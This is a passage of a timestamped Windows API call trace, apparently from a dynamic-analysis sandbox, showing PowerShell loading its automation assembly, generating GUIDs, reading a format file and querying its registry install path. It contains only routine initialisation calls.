	[0524.861] VirtualQuery (in: lpAddress=0x12b9f0, lpBuffer=0x12c8b0, dwLength=0x30 | out: lpBuffer=0x12c8b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0524.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0524.864] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x91140515, Data2=0x63f0, Data3=0x4634, Data4=([0]=0x91, [1]=0x82, [2]=0x9a, [3]=0x41, [4]=0xdc, [5]=0xaa, [6]=0xc2, [7]=0xe7))) returned 0x0
	[0524.865] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5a296e3, Data2=0x8b49, Data3=0x4ddc, Data4=([0]=0x8a, [1]=0x4, [2]=0x40, [3]=0x85, [4]=0x5e, [5]=0x46, [6]=0x89, [7]=0xeb))) returned 0x0
	[0524.866] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xba374901, Data2=0x6b5b, Data3=0x4f31, Data4=([0]=0x95, [1]=0x25, [2]=0x58, [3]=0x13, [4]=0x36, [5]=0x8d, [6]=0xbf, [7]=0x80))) returned 0x0
	[0525.827] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe7c53088, Data2=0x6d9, Data3=0x4ada, Data4=([0]=0xa9, [1]=0x1e, [2]=0xfa, [3]=0xb0, [4]=0xcb, [5]=0x8b, [6]=0x4d, [7]=0xc5))) returned 0x0
	[0525.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x59206781, Data2=0x7fb6, Data3=0x45a9, Data4=([0]=0x92, [1]=0x88, [2]=0xca, [3]=0x24, [4]=0xff, [5]=0xde, [6]=0x2d, [7]=0x17))) returned 0x0
	[0525.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x6fa181db, Data2=0xdbc6, Data3=0x453b, Data4=([0]=0xbc, [1]=0x25, [2]=0xd2, [3]=0x86, [4]=0xea, [5]=0xab, [6]=0x5, [7]=0x5e))) returned 0x0
	[0525.828] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x9bb66bbb, Data2=0xaa29, Data3=0x4816, Data4=([0]=0x81, [1]=0xd8, [2]=0x7a, [3]=0xf9, [4]=0xbe, [5]=0xd7, [6]=0x95, [7]=0x97))) returned 0x0
	[0525.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe4e9cfa4, Data2=0x71fb, Data3=0x4ae7, Data4=([0]=0xb3, [1]=0xdd, [2]=0x6f, [3]=0x31, [4]=0x33, [5]=0x2e, [6]=0x75, [7]=0xe8))) returned 0x0
	[0525.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x1ba6d37f, Data2=0x670, Data3=0x4ea4, Data4=([0]=0xaa, [1]=0x98, [2]=0xe2, [3]=0x82, [4]=0xaa, [5]=0x5a, [6]=0x49, [7]=0x41))) returned 0x0
	[0525.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xcfc42030, Data2=0x7d74, Data3=0x4ff0, Data4=([0]=0xb2, [1]=0x1, [2]=0x3c, [3]=0x40, [4]=0x5f, [5]=0x40, [6]=0xd8, [7]=0xf8))) returned 0x0
	[0525.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe7f5099c, Data2=0x1fb7, Data3=0x4305, Data4=([0]=0x86, [1]=0xe8, [2]=0xc1, [3]=0xf2, [4]=0xc3, [5]=0xe9, [6]=0x8b, [7]=0x83))) returned 0x0
	[0525.829] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x3ac25c2f, Data2=0x30e1, Data3=0x49cb, Data4=([0]=0x95, [1]=0x1a, [2]=0xd9, [3]=0xfd, [4]=0xf1, [5]=0x2a, [6]=0xcb, [7]=0xf1))) returned 0x0
	[0525.831] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xec3ef270, Data2=0xb0c2, Data3=0x43fe, Data4=([0]=0x8a, [1]=0x98, [2]=0x81, [3]=0xb7, [4]=0x4c, [5]=0x6e, [6]=0x69, [7]=0x2))) returned 0x0
	[0525.832] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xf15cb087, Data2=0xc251, Data3=0x408f, Data4=([0]=0xbc, [1]=0x7e, [2]=0x95, [3]=0x7d, [4]=0x35, [5]=0xac, [6]=0x42, [7]=0x9))) returned 0x0
	[0525.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x939e9465, Data2=0x388, Data3=0x46bb, Data4=([0]=0x8e, [1]=0x2e, [2]=0x2a, [3]=0x67, [4]=0xae, [5]=0x86, [6]=0xdc, [7]=0x52))) returned 0x0
	[0525.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x638bb375, Data2=0xe464, Data3=0x41a4, Data4=([0]=0xa6, [1]=0x47, [2]=0x3d, [3]=0x70, [4]=0x30, [5]=0x3a, [6]=0x2e, [7]=0xb3))) returned 0x0
	[0525.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xba76899a, Data2=0x43de, Data3=0x42ff, Data4=([0]=0x86, [1]=0xff, [2]=0x26, [3]=0xfd, [4]=0xc1, [5]=0x8b, [6]=0x31, [7]=0xa3))) returned 0x0
	[0525.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5df9df4a, Data2=0x3f08, Data3=0x4989, Data4=([0]=0x92, [1]=0x8, [2]=0xca, [3]=0x7a, [4]=0xb9, [5]=0x48, [6]=0xfe, [7]=0x3a))) returned 0x0
	[0525.833] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x868df453, Data2=0xbe64, Data3=0x40f8, Data4=([0]=0xa3, [1]=0x39, [2]=0x47, [3]=0xd5, [4]=0x71, [5]=0xd2, [6]=0xd4, [7]=0xad))) returned 0x0
	[0525.834] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xc1f5ed9, Data2=0x9b72, Data3=0x4059, Data4=([0]=0x9e, [1]=0xfe, [2]=0x5a, [3]=0xa4, [4]=0x3f, [5]=0x6a, [6]=0xbf, [7]=0xc8))) returned 0x0
	[0525.834] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x36892e94, Data2=0xea25, Data3=0x4751, Data4=([0]=0xaa, [1]=0x12, [2]=0x2f, [3]=0x77, [4]=0x67, [5]=0xe, [6]=0x78, [7]=0xde))) returned 0x0
	[0525.834] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x96694e26, Data2=0x42a, Data3=0x4db7, Data4=([0]=0x95, [1]=0xda, [2]=0x4b, [3]=0xbc, [4]=0x5c, [5]=0xa5, [6]=0xcb, [7]=0xf8))) returned 0x0
	[0525.834] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0525.834] GetFileType (hFile=0x324) returned 0x1
	[0525.835] SetErrorMode (uMode=0x1) returned 0x1
	[0525.835] GetFileType (hFile=0x324) returned 0x1
	[0525.835] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.836] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.836] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.836] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.836] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.836] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.837] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.837] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.837] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.839] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.839] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.839] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.840] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.840] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.840] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.840] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.841] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.842] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.842] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.842] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.843] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0525.843] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0xe67, lpOverlapped=0x0) returned 1
	[0525.843] ReadFile (in: hFile=0x324, lpBuffer=0x3034acf, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3034acf*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.843] ReadFile (in: hFile=0x324, lpBuffer=0x3035500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12cf18, lpOverlapped=0x0 | out: lpBuffer=0x3035500*, lpNumberOfBytesRead=0x12cf18*=0x0, lpOverlapped=0x0) returned 1
	[0525.843] CloseHandle (hObject=0x324) returned 1
	[0525.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0525.844] SetErrorMode (uMode=0x1) returned 0x1
	[0525.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12cec0 | out: lpFileInformation=0x12cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0525.844] SetErrorMode (uMode=0x1) returned 0x1
	[0525.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0525.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cfa8 | out: phkResult=0x12cfa8*=0x324) returned 0x0
	[0525.844] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cf2c, lpData=0x0, lpcbData=0x12cf28*=0x0 | out: lpType=0x12cf2c*=0x1, lpData=0x0, lpcbData=0x12cf28*=0x56) returned 0x0
	[0525.844] CoTaskMemAlloc (cb=0x5a) returned 0x3b3da0
	[0525.844] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cefc, lpData=0x3b3da0, lpcbData=0x12cef8*=0x56 | out: lpType=0x12cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12cef8*=0x56) returned 0x0
	[0525.845] CoTaskMemFree (pv=0x3b3da0) 
	[0525.845] RegCloseKey (hKey=0x324) returned 0x0
	[0525.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0525.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0525.846] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x9adb64d9, Data2=0x206, Data3=0x4890, Data4=([0]=0xba, [1]=0xf5, [2]=0x59, [3]=0x7d, [4]=0x7d, [5]=0xc4, [6]=0x58, [7]=0x7d))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfd96c8ec, Data2=0x239c, Data3=0x493c, Data4=([0]=0xaf, [1]=0x97, [2]=0xe, [3]=0xcd, [4]=0x3e, [5]=0xd7, [6]=0x12, [7]=0x67))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x895be968, Data2=0x9079, Data3=0x4dfe, Data4=([0]=0x86, [1]=0x7d, [2]=0x72, [3]=0x67, [4]=0x21, [5]=0xb8, [6]=0x62, [7]=0x79))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xe13ad1fe, Data2=0x1d4b, Data3=0x4868, Data4=([0]=0xa1, [1]=0x6c, [2]=0xe7, [3]=0x24, [4]=0xbc, [5]=0x0, [6]=0x3a, [7]=0xe5))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x534322ee, Data2=0x2a3f, Data3=0x4511, Data4=([0]=0x9b, [1]=0xa8, [2]=0xe6, [3]=0x8c, [4]=0x5a, [5]=0xff, [6]=0xbb, [7]=0x93))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xd69e30cd, Data2=0xeebf, Data3=0x4367, Data4=([0]=0xab, [1]=0x1, [2]=0x49, [3]=0x2c, [4]=0x8a, [5]=0x53, [6]=0x3a, [7]=0x83))) returned 0x0
	[0525.847] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5f896aaf, Data2=0xaac1, Data3=0x4b1a, Data4=([0]=0xab, [1]=0x79, [2]=0x55, [3]=0xd7, [4]=0x95, [5]=0x9b, [6]=0x89, [7]=0xc0))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x76807174, Data2=0xf6e, Data3=0x4d9a, Data4=([0]=0x9d, [1]=0x8d, [2]=0xb6, [3]=0x2b, [4]=0xce, [5]=0x53, [6]=0x2b, [7]=0xc6))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xc2aeca80, Data2=0x785e, Data3=0x48b9, Data4=([0]=0xb7, [1]=0xb2, [2]=0xd2, [3]=0x0, [4]=0xa0, [5]=0xdc, [6]=0x22, [7]=0x7a))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xad43e2e5, Data2=0x3552, Data3=0x4364, Data4=([0]=0xa6, [1]=0xe, [2]=0x91, [3]=0x6e, [4]=0xd5, [5]=0x74, [6]=0x60, [7]=0x2))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x540fa4fc, Data2=0x93b, Data3=0x483f, Data4=([0]=0xb6, [1]=0xdf, [2]=0x68, [3]=0x43, [4]=0xb4, [5]=0x86, [6]=0xe3, [7]=0xeb))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x6463812, Data2=0xa2bb, Data3=0x4fc9, Data4=([0]=0x8f, [1]=0x66, [2]=0x88, [3]=0xfe, [4]=0x54, [5]=0x65, [6]=0x63, [7]=0x9b))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x597c806f, Data2=0x1677, Data3=0x4617, Data4=([0]=0xb8, [1]=0x98, [2]=0xbd, [3]=0x11, [4]=0x99, [5]=0xa9, [6]=0x80, [7]=0x86))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xaf8010f9, Data2=0x710b, Data3=0x463e, Data4=([0]=0xa1, [1]=0xb6, [2]=0xca, [3]=0x44, [4]=0x31, [5]=0x8f, [6]=0x56, [7]=0x56))) returned 0x0
	[0525.848] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xa4613725, Data2=0x9980, Data3=0x44f1, Data4=([0]=0x99, [1]=0x5c, [2]=0xe4, [3]=0x7d, [4]=0x66, [5]=0xc2, [6]=0x21, [7]=0xa3))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xb0e42ce2, Data2=0xbe9e, Data3=0x4133, Data4=([0]=0x8b, [1]=0x61, [2]=0xdd, [3]=0xdc, [4]=0xd8, [5]=0x5d, [6]=0x2b, [7]=0x31))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xbf8eb39e, Data2=0x4dbd, Data3=0x4e50, Data4=([0]=0xb6, [1]=0xd0, [2]=0xa7, [3]=0x53, [4]=0x2, [5]=0xf1, [6]=0xba, [7]=0x74))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xa9abcb47, Data2=0xbe34, Data3=0x467f, Data4=([0]=0x8f, [1]=0x4d, [2]=0x35, [3]=0x99, [4]=0xf0, [5]=0x8b, [6]=0xc0, [7]=0xad))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x322e705c, Data2=0x5cae, Data3=0x48b8, Data4=([0]=0x8b, [1]=0x33, [2]=0x90, [3]=0xb4, [4]=0x28, [5]=0x91, [6]=0x53, [7]=0x5c))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5e6ba6d9, Data2=0xe1b2, Data3=0x4ea0, Data4=([0]=0x93, [1]=0xe1, [2]=0x7d, [3]=0xc, [4]=0x59, [5]=0xe3, [6]=0xf3, [7]=0xf7))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xde8fc3b3, Data2=0xe1b0, Data3=0x4960, Data4=([0]=0xaf, [1]=0xdf, [2]=0xbf, [3]=0x65, [4]=0x31, [5]=0x80, [6]=0x69, [7]=0x9c))) returned 0x0
	[0525.849] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xb60ce504, Data2=0x5c9, Data3=0x4ee3, Data4=([0]=0x8d, [1]=0x30, [2]=0xe2, [3]=0xd1, [4]=0x6d, [5]=0x8a, [6]=0x2f, [7]=0x27))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x5f5d5837, Data2=0xd17b, Data3=0x48e8, Data4=([0]=0x84, [1]=0x6e, [2]=0x68, [3]=0x10, [4]=0x51, [5]=0x28, [6]=0x26, [7]=0x91))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x42e4cfb1, Data2=0xcd29, Data3=0x4656, Data4=([0]=0x83, [1]=0xb7, [2]=0x2b, [3]=0x2e, [4]=0x64, [5]=0x27, [6]=0xe6, [7]=0x64))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x7a77c0f, Data2=0x3177, Data3=0x4595, Data4=([0]=0x9b, [1]=0x95, [2]=0xfe, [3]=0xd8, [4]=0x8b, [5]=0xb1, [6]=0xad, [7]=0x92))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x2bee2e, Data2=0x4d80, Data3=0x414b, Data4=([0]=0x9a, [1]=0xcd, [2]=0xd8, [3]=0x90, [4]=0x6a, [5]=0x3f, [6]=0x67, [7]=0xa2))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xfbd2472, Data2=0xb4a9, Data3=0x4c06, Data4=([0]=0x8f, [1]=0x31, [2]=0x19, [3]=0xe4, [4]=0x99, [5]=0x80, [6]=0x4, [7]=0xb7))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x304fba2a, Data2=0x3909, Data3=0x45ea, Data4=([0]=0x8d, [1]=0xea, [2]=0xee, [3]=0x59, [4]=0x61, [5]=0xe6, [6]=0xe6, [7]=0xc8))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x753fab8a, Data2=0xc74c, Data3=0x4abe, Data4=([0]=0x8c, [1]=0x89, [2]=0x40, [3]=0x55, [4]=0xa1, [5]=0xf8, [6]=0xcc, [7]=0xe7))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0x6ff2fb1a, Data2=0xc833, Data3=0x4519, Data4=([0]=0x92, [1]=0x31, [2]=0x9f, [3]=0x5a, [4]=0x33, [5]=0xd5, [6]=0xd7, [7]=0x2b))) returned 0x0
	[0525.850] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xd75dc0e, Data2=0x97d0, Data3=0x481a, Data4=([0]=0x8f, [1]=0xac, [2]=0x5c, [3]=0xae, [4]=0xa4, [5]=0x2b, [6]=0x85, [7]=0x31))) returned 0x0
	[0525.851] CoCreateGuid (in: pguid=0x12d1d0 | out: pguid=0x12d1d0*(Data1=0xc27c055b, Data2=0x8a6, Data3=0x4348, Data4=([0]=0x8a, [1]=0x93, [2]=0xf3, [3]=0x6f, [4]=0xb3, [5]=0xa8, [6]=0xdc, [7]=0xb5))) returned 0x0
